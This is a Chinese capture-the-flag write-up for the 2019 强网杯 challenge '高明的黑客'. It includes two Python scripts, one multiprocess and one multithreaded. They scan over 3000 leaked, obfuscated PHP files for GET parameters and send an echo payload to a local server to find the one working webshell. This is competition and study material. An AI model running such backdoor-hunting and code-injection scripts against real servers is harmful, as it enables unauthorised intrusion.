[强网杯 2019]高明的黑客
作者:互联网
提示有源码泄露
下载下来后,发现有3000多个文件,做了大量的混淆
推测其中有能执行的php文件
嫖一个一叶飘零大佬的脚本
大致思想是找出$_GET[]
里边的参数,然后去执行,类似于$_GET['a'] = echo "sky cool"
,如果回显中存在sky cool
,则该shell能执行
import requests
from multiprocessing import Pool
base_url = "http://localhost:8888/src/"
base_dir = "/Desktop/site/src/"
file_list = ['zzt4yxY_RMa.php',........ 'm_tgKOIy5uj.php', 'aEFo52YSPrp.php', 'Hk3aCSWcQZK.php', 'RXoiLRYSOKE.php']
def extracts(f):
gets = []
with open(base_dir + f, 'r') as f:
lines = f.readlines()
lines = [i.strip() for i in lines]
for line in lines:
if line.find("$_GET['") > 0:
start_pos = line.find("$_GET['") + len("$_GET['")
end_pos = line.find("'", start_pos)
gets.append(line[start_pos:end_pos])
return gets
def exp(start,end):
for i in range(start,end):
filename = file_list[i]
gets = extracts(filename)
print "try: %s"%filename
for get in gets:
now_url = "%s%s?%s=%s"%(base_url,filename,get,'echo "sky cool";')
r = requests.get(now_url)
if 'sky cool' in r.content:
print now_url
break
print "%s~%s not found!"%(start,end)
def main():
pool = Pool(processes=15) # set the processes max number 3
for i in range(0,len(file_list),len(file_list)/15):
pool.apply_async(exp,(i,i+len(file_list)/15,))
pool.close()
pool.join()
if __name__ == "__main__":
main()
大佬用的多进程,我自己尝试使用多线程,开30个线程跑
# coding:utf-8
import requests
import os
import threading
import time
base_url = "http://localhost/www/src/"
base_dir = "www/src/"
# file_list = ['zzt4yxY_RMa.php',........ 'm_tgKOIy5uj.php', 'aEFo52YSPrp.php', 'Hk3aCSWcQZK.php', 'RXoiLRYSOKE.php']
file_list = os.listdir(base_dir)
class GetShell(threading.Thread):
def __init__(self, begin, end, base_url, base_dir, file_list):
threading.Thread.__init__(self)
self.begin = begin
self.end = end
self.file_list = file_list
self.base_dir = base_dir
self.base_url = base_url
def run(self):
for i in range(self.begin, self.end):
filename = self.file_list[i]
gets = []
with open(self.base_dir + filename, 'r') as f:
lines = f.readlines()
lines = [i.strip() for i in lines]
for line in lines:
if line.find("$_GET['") > 0:
begin_pos = line.find("$_GET['") + len("$_GET['")
end_pos = line.find("'", begin_pos)
gets.append(line[begin_pos:end_pos])
print "try: %s" % filename
for get in gets:
now_url = "%s%s?%s=%s" % (self.base_url, filename, get, 'echo "sky cool";')
r = requests.get(now_url)
if 'sky cool' in r.content:
print now_url
break
print "%s~%s not found!" % (self.begin, self.end)
threads = []
thread_count = 30
for i in range(thread_count):
threads.append(
GetShell(i*(len(file_list)/thread_count),(i+1)*(len(file_list)/thread_count), base_url, base_dir,
file_list))
for t in threads:
t.start()
for t in threads:
t.join()
花了一个半钟头
执行一下
获取flag
参考
https://skysec.top/2019/05/25/2019-强网杯online-Web-Writeup/#高明的黑客
标签:end,file,url,self,list,强网杯,黑客,2019,base 来源: https://www.cnblogs.com/h3ng/p/14375288.html